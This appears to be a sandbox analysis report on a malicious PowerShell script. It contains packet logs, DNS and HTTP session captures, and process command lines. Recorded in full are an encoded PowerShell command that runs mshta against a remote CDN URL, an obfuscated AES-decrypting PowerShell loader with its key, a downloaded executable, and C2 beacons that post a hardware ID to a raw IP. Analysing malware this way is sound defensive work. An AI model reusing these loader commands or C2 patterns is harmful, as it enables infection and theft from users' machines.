                                  Aug 10, 2024 19:10:11.717551947 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.717556953 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.717571020 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.717598915 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.717617035 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.717628002 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.717662096 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.717663050 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.717910051 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.717942953 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.717978001 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.717988968 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.718019009 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.718035936 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.718137026 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.718159914 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.718195915 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.718206882 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.718235016 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.718252897 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.718388081 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.718417883 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.718455076 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.718465090 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.718492985 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.718499899 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.718508959 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.718518019 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.718544006 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.718544960 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.718573093 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.718583107 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.718612909 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.718630075 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.719132900 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.719156981 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.719196081 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.719211102 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.719234943 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.719250917 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.719353914 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.719377041 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.719412088 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.719422102 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.719448090 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.719469070 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.719516039 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.719542027 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.719575882 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.719584942 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.719614029 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.719630003 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.719634056 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.719644070 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.719669104 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.719681978 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.719691992 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.719724894 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.719743967 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.720345974 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.720376968 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.720417976 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.720433950 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.720457077 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.720474958 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.720475912 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.720498085 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.720529079 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.720532894 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.720546961 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.720556974 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.720585108 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.720604897 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.720624924 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.720655918 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.720690012 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.720699072 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.720726967 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.720747948 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.720765114 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.720791101 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.720825911 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.720837116 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.720863104 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.720880032 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.721111059 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.721138000 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.721177101 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.721187115 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.721215010 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.721235037 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.721252918 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.721285105 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.721321106 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.721330881 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.721359015 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.721375942 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.721398115 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.721424103 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.721457005 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.721467972 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.721493959 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.721513987 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.751471043 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.751527071 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.751650095 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.751703978 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.751805067 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.751806021 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.751806021 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.751872063 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.778511047 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.778569937 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.778665066 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.778666019 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.778732061 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.778769970 CEST44349734185.93.1.250192.168.2.4
                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                  Aug 10, 2024 19:10:01.495141983 CEST | 53846 | 53 | 192.168.2.4 | 1.1.1.1
                                  Aug 10, 2024 19:10:01.507226944 CEST | 53 | 53846 | 1.1.1.1 | 192.168.2.4
                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                  Aug 10, 2024 19:10:01.495141983 CEST | 192.168.2.4 | 1.1.1.1 | 0xf82f | Standard query (0) | bidvertiser.b-cdn.net | A (IP address) | IN (0x0001) | false
                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                  Aug 10, 2024 19:10:01.507226944 CEST | 1.1.1.1 | 192.168.2.4 | 0xf82f | No error (0) | bidvertiser.b-cdn.net | | 185.93.1.250 | A (IP address) | IN (0x0001) | false
                                  • bidvertiser.b-cdn.net
                                  • 193.176.153.234
                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  0 | 192.168.2.4 | 49743 | 193.176.153.234 | 80 | 7916 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Aug 10, 2024 19:10:28.820652008 CEST | 90 | OUT | GET / HTTP/1.1
                                  Host: 193.176.153.234
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Aug 10, 2024 19:10:29.483603001 CEST | 170 | IN | HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Sat, 10 Aug 2024 17:10:29 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 0
                                  Connection: keep-alive
                                  Aug 10, 2024 19:10:29.525382042 CEST | 412 | OUT | POST /587ec30955d49a9c.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGID
                                  Host: 193.176.153.234
                                  Content-Length: 210
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 45 44 33 43 31 39 30 41 43 32 32 33 31 32 30 32 37 36 32 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 63 72 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 2d 2d 0d 0a
                                  Data Ascii: ------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="hwid"27ED3C190AC22312027626------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="build"cr3------BGHJJDGHCBGDHIECBGID--
                                  Aug 10, 2024 19:10:37.251897097 CEST | 178 | IN | HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Sat, 10 Aug 2024 17:10:37 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 8
                                  Connection: keep-alive
                                  Data Raw: 59 6d 78 76 59 32 73 3d
                                  Data Ascii: YmxvY2s=


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  0 | 192.168.2.4 | 49730 | 185.93.1.250 | 443 | 7172 | C:\Windows\System32\mshta.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  2024-08-10 17:10:02 UTC | 331 | OUT | GET /smart1 HTTP/1.1
                                  Accept: */*
                                  Accept-Language: en-CH
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: bidvertiser.b-cdn.net
                                  Connection: Keep-Alive
                                  2024-08-10 17:10:02 UTC | 637 | IN | HTTP/1.1 200 OK
                                  Date: Sat, 10 Aug 2024 17:10:02 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 166102
                                  Connection: close
                                  Server: BunnyCDN-IL1-941
                                  CDN-PullZone: 2426042
                                  CDN-Uid: 4ec946d1-7652-4f1a-8e05-bff5e7098a3d
                                  CDN-RequestCountryCode: US
                                  Cache-Control: public, max-age=2592000
                                  Last-Modified: Sat, 10 Aug 2024 07:21:49 GMT
                                  CDN-StorageServer: NY-346
                                  CDN-FileServer: 622
                                  CDN-ProxyVer: 1.04
                                  CDN-RequestPullSuccess: True
                                  CDN-RequestPullCode: 206
                                  CDN-CachedAt: 08/10/2024 09:53:20
                                  CDN-EdgeStorageId: 1069
                                  CDN-Status: 200
                                  CDN-RequestId: 83cab67edb2c1567f00eb01f0d6a10a5
                                  CDN-Cache: HIT
                                  Accept-Ranges: bytes
                                  2024-08-10 17:10:02 UTC16384INData Raw: 2c 63 75 2c 71 55 2c 41 4a 2c 77 6e 2c 76 67 2c 74 4c 2c 41 4a 2c 77 6e 2c 63 75 2c 6f 43 2c 41 4a 2c 77 6e 2c 63 75 2c 7a 4a 2c 41 4a 2c 77 6e 2c 63 75 2c 7a 4a 2c 41 4a 2c 77 6e 2c 63 75 2c 71 55 2c 41 4a 2c 77 6e 2c 63 75 2c 63 75 2c 41 4a 2c 77 6e 2c 63 75 2c 79 46 2c 41 4a 2c 77 6e 2c 63 75 2c 6f 43 2c 41 4a 2c 77 6e 2c 63 75 2c 79 46 2c 41 4a 2c 77 6e 2c 63 75 2c 76 67 2c 41 4a 2c 77 6e 2c 77 6e 2c 63 75 2c 41 4a 2c 77 6e 2c 74 4c 2c 71 55 2c 41 4a 2c 77 6e 2c 63 75 2c 6f 43 2c 41 4a 2c 77 6e 2c 77 6e 2c 63 75 2c 41 4a 2c 77 6e 2c 76 67 2c 77 6e 2c 41 4a 2c 77 6e 2c 63 75 2c 7a 4a 2c 41 4a 2c 77 6e 2c 77 6e 2c 76 67 2c 41 4a 2c 77 6e 2c 74 4c 2c 71 55 2c 41 4a 2c 77 6e 2c 63 75 2c 76 67 2c 41 4a 2c 77 6e 2c 63 75 2c 76 67 2c 41 4a 2c 77 6e 2c 77 6e
                                  Data Ascii: ,cu,qU,AJ,wn,vg,tL,AJ,wn,cu,oC,AJ,wn,cu,zJ,AJ,wn,cu,zJ,AJ,wn,cu,qU,AJ,wn,cu,cu,AJ,wn,cu,yF,AJ,wn,cu,oC,AJ,wn,cu,yF,AJ,wn,cu,vg,AJ,wn,wn,cu,AJ,wn,tL,qU,AJ,wn,cu,oC,AJ,wn,wn,cu,AJ,wn,vg,wn,AJ,wn,cu,zJ,AJ,wn,wn,vg,AJ,wn,tL,qU,AJ,wn,cu,vg,AJ,wn,cu,vg,AJ,wn,wn
                                  2024-08-10 17:10:02 UTC16384INData Raw: 79 46 2c 41 4a 2c 74 4c 2c 4d 62 2c 71 55 2c 41 4a 2c 74 4c 2c 6f 43 2c 4d 62 2c 41 4a 2c 77 6e 2c 76 67 2c 71 55 2c 41 4a 2c 77 6e 2c 76 67 2c 77 6e 2c 41 4a 2c 77 6e 2c 76 67 2c 7a 4a 2c 41 4a 2c 77 6e 2c 63 75 2c 45 73 2c 41 4a 2c 77 6e 2c 76 67 2c 45 73 2c 41 4a 2c 77 6e 2c 79 46 2c 6f 43 2c 41 4a 2c 77 6e 2c 79 46 2c 76 67 2c 41 4a 2c 74 4c 2c 6f 43 2c 74 4c 2c 41 4a 2c 74 4c 2c 71 55 2c 7a 4a 2c 41 4a 2c 74 4c 2c 6f 43 2c 74 4c 2c 41 4a 2c 74 4c 2c 4d 62 2c 71 55 2c 41 4a 2c 74 4c 2c 71 55 2c 77 6e 2c 41 4a 2c 74 4c 2c 4d 62 2c 6f 43 2c 41 4a 2c 77 6e 2c 74 4c 2c 74 4c 2c 41 4a 2c 77 6e 2c 77 6e 2c 79 46 2c 41 4a 2c 74 4c 2c 6f 43 2c 6f 43 2c 41 4a 2c 77 6e 2c 76 67 2c 76 67 2c 41 4a 2c 74 4c 2c 71 55 2c 4d 62 2c 41 4a 2c 74 4c 2c 4d 62 2c 63 75 2c
                                  Data Ascii: yF,AJ,tL,Mb,qU,AJ,tL,oC,Mb,AJ,wn,vg,qU,AJ,wn,vg,wn,AJ,wn,vg,zJ,AJ,wn,cu,Es,AJ,wn,vg,Es,AJ,wn,yF,oC,AJ,wn,yF,vg,AJ,tL,oC,tL,AJ,tL,qU,zJ,AJ,tL,oC,tL,AJ,tL,Mb,qU,AJ,tL,qU,wn,AJ,tL,Mb,oC,AJ,wn,tL,tL,AJ,wn,wn,yF,AJ,tL,oC,oC,AJ,wn,vg,vg,AJ,tL,qU,Mb,AJ,tL,Mb,cu,
                                  2024-08-10 17:10:02 UTC16384INData Raw: 50 6a 40 ff 15 58 80 40 00 89 45 f4 85 c0 0f 84 b8 00 00 00 33 ff 39 3d c4 73 40 00 76 62 89 45 f8 8b d0 8b cf e8 92 e9 ff ff 85 c0 75 3e 8b 45 f8 83 c0 14 50 6a 00 68 43 01 00 00 53 ff 15 0c 81 40 00 8b d8 83 fb ff 74 75 83 fb fe 74 70 57 53 68 51 01 00 00 ff 75 fc ff 15 0c 81 40 00 3b 3d 40 70 40 00 75 49 8b f3 8b 5d fc 8b 45 f8 47 05 14 02 00 00 89 45 f8 3b 3d c4 73 40 00 72 a1 33 ff 57 57 68 46 01 00 00 53 ff 15 0c 81 40 00 85 c0 74 2b 8d 46 01 f7 d8 57 1b c0 23 c6 50 68 4e 01 00 00 53 ff 15 0c 81 40 00 33 c0 40 eb 21 83 fe ff 74 b4 3b de 8b 5d fc 77 b0 46 eb ad ff 75 f4 ff 15 3c 80 40 00 33 c0 eb 05 b8 44 00 00 80 5f 5e 5b c9 c3 cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 0c 53 56 57 6a 00 6a 00 8b f1 8b da 68 46 01 00 00 56 89 5d fc 83 cf ff ff 15 0c 81
                                  Data Ascii: Pj@X@E39=s@vbEu>EPjhCS@tutpWShQu@;=@p@uI]EGE;=s@r3WWhFS@t+FW#PhNS@3@!t;]wFu<@3D_^[USVWjjhFV]
                                  2024-08-10 17:10:02 UTC16384INData Raw: 36 bd 36 cf 36 dd 36 e3 36 ee 36 f4 36 fc 36 0b 37 16 37 1e 37 24 37 2a 37 36 37 48 37 4e 37 58 37 65 37 6f 37 7e 37 8c 37 9a 37 a6 37 b6 37 bc 37 dc 37 eb 37 f0 37 fa 37 11 38 17 38 22 38 28 38 4f 38 61 38 67 38 6d 38 7a 38 84 38 93 38 a1 38 cc 38 06 39 19 39 40 39 5c 39 62 39 7b 39 8d 39 a8 39 c5 39 fe 39 17 3a 24 3a 36 3a 3b 3a 63 3a 80 3a 86 3a 8e 3a a9 3a ae 3a ba 3a d3 3a f5 3a 01 3b 07 3b 10 3b 16 3b 27 3b 30 3b 41 3b 4b 3b 51 3b 5c 3b 62 3b 7a 3b 8f 3b 9a 3b a4 3b b3 3b ba 3b d1 3b ed 3b f3 3b fd 3b 0c 3c 31 3c 49 3c 56 3c ce 3c d4 3c e0 3c 18 3e 1e 3e 2f 3e 35 3e 46 3e 4c 3e 5a 3e 63 3e 6a 3e 8c 3e a9 3e c3 3e d2 3e ea 3e 19 3f 2b 3f 33 3f 5b 3f 96 3f b4 3f d1 3f 00 50 00 00 6c 01 00 00 56 30 70 30 ac 30 bf 30 ca 30 fa 30 4e 31 58 31 8b 31 f6 31
                                  Data Ascii: 66666666777$7*767H7N7X7e7o7~777777777788"8(8O8a8g8m8z8888899@9\9b9{99999:$:6:;:c:::::::::;;;;';0;A;K;Q;\;b;z;;;;;;;;;;<1<I<V<<<<>>/>5>F>L>Z>c>j>>>>>>?+?3?[????PlV0p00000N1X111


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  1 | 192.168.2.4 | 49734 | 185.93.1.250 | 443 | 7336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  2024-08-10 17:10:06 UTC | 81 | OUT | GET /smart1.zip HTTP/1.1
                                  Host: bidvertiser.b-cdn.net
                                  Connection: Keep-Alive
                                  2024-08-10 17:10:06 UTC | 628 | IN | HTTP/1.1 200 OK
                                  Date: Sat, 10 Aug 2024 17:10:06 GMT
                                  Content-Type: application/zip
                                  Content-Length: 7245419
                                  Connection: close
                                  Server: BunnyCDN-IL1-941
                                  CDN-PullZone: 2426042
                                  CDN-Uid: 4ec946d1-7652-4f1a-8e05-bff5e7098a3d
                                  CDN-RequestCountryCode: US
                                  Cache-Control: public, max-age=2592000
                                  Last-Modified: Sat, 10 Aug 2024 06:15:38 GMT
                                  CDN-StorageServer: NY-268
                                  CDN-FileServer: 749
                                  CDN-ProxyVer: 1.04
                                  CDN-RequestPullSuccess: True
                                  CDN-RequestPullCode: 206
                                  CDN-CachedAt: 08/10/2024 09:36:09
                                  CDN-EdgeStorageId: 894
                                  CDN-Status: 200
                                  CDN-RequestId: b00bf97ff3173da8042ea8752f63991c
                                  CDN-Cache: HIT
                                  Accept-Ranges: bytes



                                  Target ID:0
                                  Start time:13:09:57
                                  Start date:10/08/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1"
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:1
                                  Start time:13:09:57
                                  Start date:10/08/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:2
                                  Start time:13:09:59
                                  Start date:10/08/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:3
                                  Start time:13:09:59
                                  Start date:10/08/2024
                                  Path:C:\Windows\System32\mshta.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\mshta.exe" https://bidvertiser.b-cdn.net/smart1
                                  Imagebase:0x7ff725720000
                                  File size:14'848 bytes
                                  MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:4
                                  Start time:13:10:01
                                  Start date:10/08/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                  Imagebase:0x7ff6eef20000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:5
                                  Start time:13:10:03
                                  Start date:10/08/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function HbAHmnxA($ZzZovm){return -split ($ZzZovm -replace '..', '0x$& ')};$PEcdKn = HbAHmnx[...]jqkxh = [System.Security.Cryptography.Aes]::Create();$jqkxh.Key = HbAHmnxA('52615577706262664D6D43476F4F4344');$jqkxh.IV = New-Object byte[] 16;$SpkOqCAK = $jqkxh.CreateDecryptor();$cWklkDGxO = $SpkOqCAK.TransformFinalBlock($PEcdKn, 0, $PEcdKn.Length);$mTmnXpOAf = [System.Text.Encoding]::Utf8.GetString($cWklkDGxO);$SpkOqCAK.Dispose();& $mTmnXpOAf.Substring(0,3) $mTmnXpOAf.Substring(3)
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:6
                                  Start time:13:10:03
                                  Start date:10/08/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:8
                                  Start time:13:10:17
                                  Start date:10/08/2024
                                  Path:C:\Users\user\AppData\Roaming\0SmartAssem.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user\AppData\Roaming\0SmartAssem.exe"
                                  Imagebase:0x7ff74ca60000
                                  File size:14'349'824 bytes
                                  MD5 hash:517C4A0A27D1C022A3319AF316407810
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Go lang
                                  Yara matches:
                                  • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000008.00000002.1996165603.000000C000380000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000008.00000000.1897589705.00007FF74D0EC000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000008.00000002.2003314361.00007FF74D0EC000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: C:\Users\user\AppData\Roaming\0SmartAssem.exe, Author: Joe Security
                                  Antivirus matches:
                                  • Detection: 18%, ReversingLabs
                                  Reputation:low
                                  Has exited:true

                                  Target ID:11
                                  Start time:13:10:27
                                  Start date:10/08/2024
